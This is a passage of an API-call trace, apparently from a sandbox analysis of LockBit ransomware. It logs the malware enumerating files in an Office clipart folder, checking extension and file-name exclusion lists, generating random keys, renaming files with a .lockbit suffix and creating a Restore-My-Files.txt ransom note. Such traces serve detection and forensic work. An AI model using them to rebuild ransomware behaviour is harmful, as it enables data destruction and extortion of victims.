[0147.702] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.702] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF.lockbit") returned 72 [0147.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.704] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.704] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.704] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=28626) returned 1 [0147.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.705] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.709] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.709] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.710] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.711] free (_Block=0x1fa2ed8) [0147.711] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.711] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.711] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183198.WMF", cAlternateFileName="")) returned 1 [0147.711] lstrcmpiW (lpString1=".", lpString2="J0183198.WMF") returned -1 [0147.711] lstrcmpiW (lpString1="..", lpString2="J0183198.WMF") returned -1 [0147.711] PathFindExtensionW (pszPath="J0183198.WMF") returned=".WMF" [0147.711] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.711] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.711] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.712] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.713] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.713] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183198.WMF") returned 1 [0147.714] lstrcmpiW (lpString1="ntldr", lpString2="J0183198.WMF") returned 1 [0147.714] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183198.WMF") returned 1 [0147.714] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183198.WMF") returned -1 [0147.714] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183198.WMF") returned -1 [0147.714] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183198.WMF") returned 1 [0147.714] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183198.WMF") returned -1 [0147.714] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.714] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned=".WMF" [0147.714] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.714] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.714] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.715] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.716] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.716] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.716] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.716] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.716] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.716] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.716] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF.lockbit") returned 72 [0147.716] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.717] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.717] malloc (_Size=0x40068) returned 0x3d70450 [0147.717] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=24430) returned 1 [0147.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.719] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.725] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.725] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.725] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.726] free (_Block=0x1fa2ed8) [0147.726] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.726] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.726] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183574.WMF", cAlternateFileName="")) returned 1 [0147.726] lstrcmpiW (lpString1=".", lpString2="J0183574.WMF") returned -1 [0147.726] lstrcmpiW (lpString1="..", lpString2="J0183574.WMF") returned -1 [0147.726] PathFindExtensionW (pszPath="J0183574.WMF") returned=".WMF" [0147.727] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.727] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.728] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.728] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.729] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183574.WMF") returned 1 [0147.729] lstrcmpiW (lpString1="ntldr", lpString2="J0183574.WMF") returned 1 [0147.729] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183574.WMF") returned 1 [0147.729] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183574.WMF") returned -1 [0147.729] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183574.WMF") returned -1 [0147.729] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183574.WMF") returned 1 [0147.729] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183574.WMF") returned -1 [0147.729] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.729] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned=".WMF" [0147.730] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.730] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.730] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.731] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.731] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.lockbit") returned 72 [0147.731] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0147.737] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.737] malloc (_Size=0x40068) returned 0x3e70008 [0147.737] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=19274) returned 1 [0147.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.739] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.743] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.743] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.744] free (_Block=0x1fa2ed8) [0147.744] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.744] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.744] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.745] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c88, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185670.WMF", cAlternateFileName="")) returned 1 [0147.745] lstrcmpiW (lpString1=".", lpString2="J0185670.WMF") returned -1 [0147.745] lstrcmpiW (lpString1="..", lpString2="J0185670.WMF") returned -1 [0147.745] PathFindExtensionW (pszPath="J0185670.WMF") returned=".WMF" [0147.745] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.745] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".prf", lpString2=".WMF") 